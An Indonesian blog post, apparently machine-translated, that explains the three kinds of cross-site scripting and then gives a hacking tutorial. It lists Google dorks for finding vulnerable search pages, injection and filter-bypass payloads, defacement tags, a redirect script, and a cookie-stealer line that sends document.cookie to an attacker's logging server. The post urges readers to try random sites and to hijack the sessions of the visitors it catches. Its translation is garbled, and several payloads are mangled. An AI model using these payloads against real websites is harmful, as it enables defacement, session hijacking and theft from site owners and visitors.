jjjj Cool Grey Outer Glow Pointer
jkkhjkhk
Home » deface » pengertian » php-html » Tutorial » Penjelasan Cross Site Scripting ( XSS ) Website
April 09, 2017
1 komentar

Penjelasan Cross Site Scripting ( XSS ) Website

‘XSS’ juga dikenal sebagai ‘CSS’ - Cross Site Scripting.


 Ini adalah kerentanan yang sangat umum ditemukan di Aplikasi Web, ‘XSS’ memungkinkan penyerang untuk INSERT kode berbahaya, Ada banyak jenis serangan XSS, saya akan menyebutkan 3 yang paling banyak digunakan. semacam ini kerentanan memungkinkan “penyerang” untuk menyuntikkan beberapa kode ke dalam aplikasi terpengaruh untuk memotong akses ke situs web atau menerapkan “phishing” pada pengguna jatuh.
Teknik ini juga digunakan untuk website Hacking.

Jenis XSS:

Sebenarnya ada tiga jenis Cross-Site Scripting, biasa disebut sebagai:

 XSS DOM Berbasis
Non-persistent XSS
persistent XSS

DOM Berbasis: The DOM Berbasis Cross-Site Scripting memungkinkan untuk seorang penyerang untuk bekerja tidak pada situs korban tetapi pada mesin lokal korban: berbagai sistem operasi biasanya meliputi “sejak lahir” beberapa halaman HTML diciptakan untuk differents tujuan, tetapi sebagai selama manusia melakukan kesalahan ini halaman HTML sering dapat dimanfaatkan karena kerentanan kode.

XSS DOM Berbasis mengeksploitasi masalah ini pada pengguna mesin lokal dengan cara ini:

- Penyerang menciptakan sebuah website berbahaya baik dibangun
- Pengguna cerdik membuka situs yang
- Pengguna memiliki halaman rentan pada mesinnya
- Website penyerang mengirimkan perintah ke halaman HTML rentan
- Halaman lokal rentan mengeksekusi bahwa perintah dengan hak pengguna pada mesin itu.
- Penyerang mudah mendapatkan kontrol pada komputer korban.

Non-Persistent: The non-persistent XSS sebenarnya paling commons kerentanan yang dapat ditemukan di Net. Ini umumnya disebut sebagai “non-persistent” karena bekerja pada respon HTTP langsung dari website korban: itu muncul ketika halaman web mendapatkan data yang diberikan oleh klien penyerang untuk secara otomatis menghasilkan halaman hasil untuk penyerang sendiri. Berdiri di ini penyerang bisa memberikan beberapa kode berbahaya dan mencoba untuk membuat server mengeksekusinya untuk mendapatkan beberapa hasil.

Yang paling umum menerapkan semacam ini kerentanan di Search engine dalam website: penyerang menulis beberapa kode HTML sewenang-wenang dalam textbox pencarian dan, jika website ini rentan, halaman hasil akan mengembalikan hasil dari entitas HTML.

Persistent: The kerentanan XSS gigih mirip dengan jenis kedua (Non-persistent XSS), karena kedua bekerja pada sebuah situs korban dan mencoba untuk hack pengguna informasi dan perbedaannya adalah bahwa dalam website rentan terhadap gigih XSS penyerang tidak perlu memberikan url dibuat untuk para pengguna, karena website itu sendiri memungkinkan pengguna untuk memasukkan data tetap ke dalam sistem: ini adalah kasus untuk contoh “guestbook”. Biasanya pengguna menggunakan semacam alat untuk meninggalkan pesan kepada pemilik website dan pada pandangan pertama itu tidak tampak sesuatu yang berbahaya, tetapi jika seorang penyerang menemukan bahwa sistem ini rentan dapat memasukkan beberapa kode berbahaya dalam pesannya dan membiarkan SEMUA pengunjung menjadi korban itu.

Ini bekerja ketika alat yang disediakan (buku tamu pada contoh) tidak melakukan cek pada isi pesan dimasukkan: hanya memasukkan data yang disediakan dari pengguna ke halaman hasil.

Cara Cari XSS Kerentanan: -

Untuk mulai menemukan Kerentanan ini Anda dapat mulai memeriksa Blog, Forum, Shoutboxes, Komentar box, Kotak Pencarian ini, ada terlalu banyak untuk disebutkan.

Menggunakan ‘Google Dorks’ untuk membuat menemukan lebih mudah, Ok jika Anda ingin mendapatkan retak, pergi ke google.com dan ketik inurl: "? Search.php q =" sekarang adalah halaman umum dan memiliki banyak hasil. Juga mencatat bahwa sebagian besar situs memiliki XSS Kerentanan, itu hanya memiliki mata yang baik, dan beberapa pengetahuan yang baik tentang bagaimana untuk memotong filtrasi mereka

Dasar-dasar dari XSS:

Nah sekarang mari kita mulai belajar beberapa Metode Aktual, yang paling umum digunakan XSS injection adalah:

<Script> alert ( "Priyanshu") </ script>

sekarang ini akan mengingatkan pesan popup, mengatakan “Priyanshu” tanpa tanda kutip.

Jadi, gunakan "search.php? Q =" dan Anda hanya bisa mencoba hal berikut pada sebuah situs web dengan hal yang sama,

http://website.com/search.php?q= <script> alert ( "Priyanshu") </ script>

Ada kemungkinan yang baik itu bekerja, tapi jangan khawatir jika tidak, hanya mencoba situs yang berbeda. Anda dapat memasukkan HTML tidak hanya javascript.

http://website.com/search.php?q= <br> <b> <u> Priyanshu </ u> </ b>

Jika Anda melihat teks tebal di halaman dan baris baru maka Anda tahu itu rentan.


Cara Deface Website menggunakan XSS?

Nah sekarang Anda memahami bagaimana XSS bekerja, kita dapat menjelaskan beberapa XSS sederhana deface metode, ada banyak cara untuk defacing saya akan menyebutkan beberapa yang terbaik dan paling banyak digunakan, yang pertama menjadi IMG SCR, sekarang bagi anda yang tidak tahu HTML, IMG SCR adalah tag, yang menampilkan IMAGE terkait dengan hal itu pada halaman web.

<Html> <body> <IMG SRC = "http://website.com/yourDefaceIMAGE.png"> </ body> </ html>

ok jika Anda mengubah link ke link gambar yang valid, dan menyimpan dan menjalankannya Anda akan melihat apa yang saya maksud. Sekarang mengatakan Anda telah menemukan sebuah shoutbox, kotak komentar, atau apapun yang menunjukkan data Anda setelah Anda kirimkan itu Anda bisa memasukkan berikut untuk membuat tampilan gambar pada halaman.

<IMG SRC = "http://site.com/yourDefaceIMAGE.png">

Tag lain yang tidak diperlukan memiliki halaman akan sudah memilikinya. Ok itu membantu untuk membuat gambar Anda besar sehingga menonjol dan jelas situs yang punya hack. Metode lain adalah dengan menggunakan video FLASH, yang sama memiliki metode di bawah ini tapi deface lebih bergaya.

<EMBED SRC = "http://site.com/xss.swf"

Yang akan mengeksekusi flash video terkait dengan hal itu. Atau mungkin menggunakan pop atau redirection sebagai:

<Script> window.open ( "http://www.shareking-go.ga") </ script>

Ada banyak orang lain cara yang Anda dapat ditemukan menggunakan Google atau situs web lainnya.
Tujuan saya adalah untuk membuat Anda memahami konsep

Cara Membuat Sebuah script Cookie Stealer Php?

ok sekarang Anda memilikinya menyimpannya memiliki file php dan meng-upload ke server Anda, ingatlah untuk membuat file ‘log.txt’ terlalu
dan chmod ke 777, ok sekarang menemukan situs XSS rentan, jenis serangan yang akan dilakukan.

ok sekarang Anda akan ingin memasukkan kode ini.

window.location = "http://yourServer.com/cookielogger.php?c=" + document.cookie
atau
document.location = "http://yourServer.com/cookielogger.php?c=" + document.cookie

sekarang ketika pengguna mengunjungi halaman yang mendapat disuntikkan juga, mereka akan dikirim ke situs, dan Cookie akan dicuri.
yang kedua adalah lebih siluman. Perhatikan file Anda sekarang ke cookie, maka Anda dapat membajak sesi mereka

Cara Bypass Filtrasi?

Banyak situs mungkin tampak rentan tetapi tidak mengeksekusi kode, baik untuk memecahkan masalah ini membaca ini. Beberapa metode umum untuk memotong filtrasi adalah

') Alert (' XSS');
atau
"); Alert ( 'XSS');

Yang akan melakukan hal yang sama seperti <script> alert ( "XSS") </ script> pada server rentan.
Anda juga dapat mencoba hexing atau base64 encoding data Anda sebelum Anda kirimkan, Harap dicatat praktek yang buruk untuk menggunakan alert ( “XSS”) untuk menguji XSS, karena beberapa situs memblokir kata kunci “XSS” sebelum jadi kami menggunakan “Priyanshu”.

Beberapa cara lain untuk filtrasi memotong

website.com/search.php?q = "> <script> alert ( 'Priyanshu') </ script>
website.com/search.php?q = "> <script> alert (" Priyanshu ") </ script>
website.com/search.php?q = "> <script> alert (" Priyanshu "); </ script>
website.com/search.php?q = "> <script> alert (/ Priyanshu"); </ script>
website.com/search.php?q = // "> <script> alert (/ Priyanshu /); </ script>
website.com/search.php?q=xyz<script>alert(/Priyanshu /); </ script>
website.com/search.php?q=xyz "> <script> alert (/ Priyanshu /); </ script>
website.com/search.php?q=xyz "> </ script> <script> alert (/ Priyanshu /); </ script>
website.com/search.php?q=000" > <script> </ script> <script> alert (Priyanshu); </ script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu /); </ script>
website.com/search.php?q = - <script> "> </ script> alert (/ Priyanshu /); </ script>
website.com/search.php?q="><img src = 'javascript: alert (' Priyanshu ');'>
website.com/search.php?q="><script src = 'http: //virus.js' </ script>


Semoga Bermanfaat Dan Jangan Lupa Terus Kunjungi Blog Kami , Apabila ada Yang Kurang Mohon Comment Dan Jangan Lupa Share Di Bawah Ini !!

Diposting oleh
Label: , , ,
Share:

1 komentar:

Langganan: Posting Komentar (Atom)